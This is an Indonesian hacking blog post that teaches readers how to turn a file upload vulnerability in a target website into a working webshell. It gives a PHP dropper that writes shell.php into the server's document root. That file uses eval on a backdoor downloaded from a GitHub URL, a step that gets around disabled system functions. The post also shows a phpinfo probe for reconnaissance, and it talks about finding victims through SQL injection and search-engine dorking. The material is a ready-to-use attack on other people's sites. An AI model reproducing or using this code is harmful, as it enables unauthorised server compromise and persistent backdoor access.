Ad Unit (Iklan) BIG

Bypass shell yang terdownload saat melakukan Arbitrary File Upload

Post a Comment

 



-

Hai Sobat.

Saya ikal,

Disini saya akan share sesuatu nih.

-


Pernah gak sih kalian capek capek ngelakuin injeksi sql dan berhasil tembus ke dashboard admin, eh pas udah upload shell, shellnya terdownload. Atau udah capek capek ngedork sana sini pakai google,bing,atau mungkin kalian sampai ngedork di duckduckgo pas nemu site vuln eh shell yang sudah terupload malah terdownload.


Nah mimin punya trik untuk membypassnya, Tapi pertama tama hal yang harus diperhatikan untuk melakukan trik ini ialah saat shell terdownload, code dari shell kita tereksekusi oleh server. Contohnya disini mimin punya site yang vuln terhadap JFU (Jquery File Upload), Dan saat selesai mimin upload webshell ketarget, mimin akses webshellnya yang terjadi adalah file webshell tadi terdownload. Tapi, saat mimin buka, code dari file tersebut telah tereksekusi.



Jika tereksekusi seperti diatas, berarti kita hanya tinggal melakukan RCE kesitarget saja, Disini mimin punya kebiasaan kalo mau melakukan RCE mimin bakal cek phpinfo nya dulu untuk mengetahui disable_function apa saja yang ada. Mimin upload code seperti ini.


<?php phpinfo(); ?>


Upload lalu akses filenya dan buka dicode editor apa saja. Dan saat mimin cek ternyata function system,passthru,exec,shell_exec didisable oleh server. yaudah lakuin ini aja biar garibet ribet.


Simpan code dibawah lalu upload file berisi code dibawah ke target kalian.



<?php

$dir = $_SERVER['DOCUMENT_ROOT'] . '/';
$file_to_write = 'shell.php';
$content_to_write = "<?php eval('?>'.file_get_contents('https://raw.githubusercontent.com/zerobyte-id/PHP-Backdoor/master/0byt3m1n1/0byt3m1n1.php'));?>";
if( is_dir($dir) === false )
{
    mkdir($dir);
}
$file = fopen($dir . '/' . $file_to_write,"w");
fwrite($file, $content_to_write);
fclose($file);
include $dir . '/' . $file_to_write;

?>


Lalu upload kewebsite target kalian. Jika sudah berhasil terupload, akses file tadi maka kalian akan mendownload filenya. Jika sudah terdownload, lanjut kalian akses seperti ini.


https://localhost/shell.php


 Dan yap, shell kalian sudah tidak terdownload lagi, dan sudah berada didocument root.


Sekian, Terimakasih.

Haikal_
Hai sobat, Saya ikal. Disini kalian bisa learning mengenai sesuatu dari setiap artikel yang saya buat :D.
Newest Older

Related Posts

Post a Comment

Dapatkan Notifikasi Dengan Email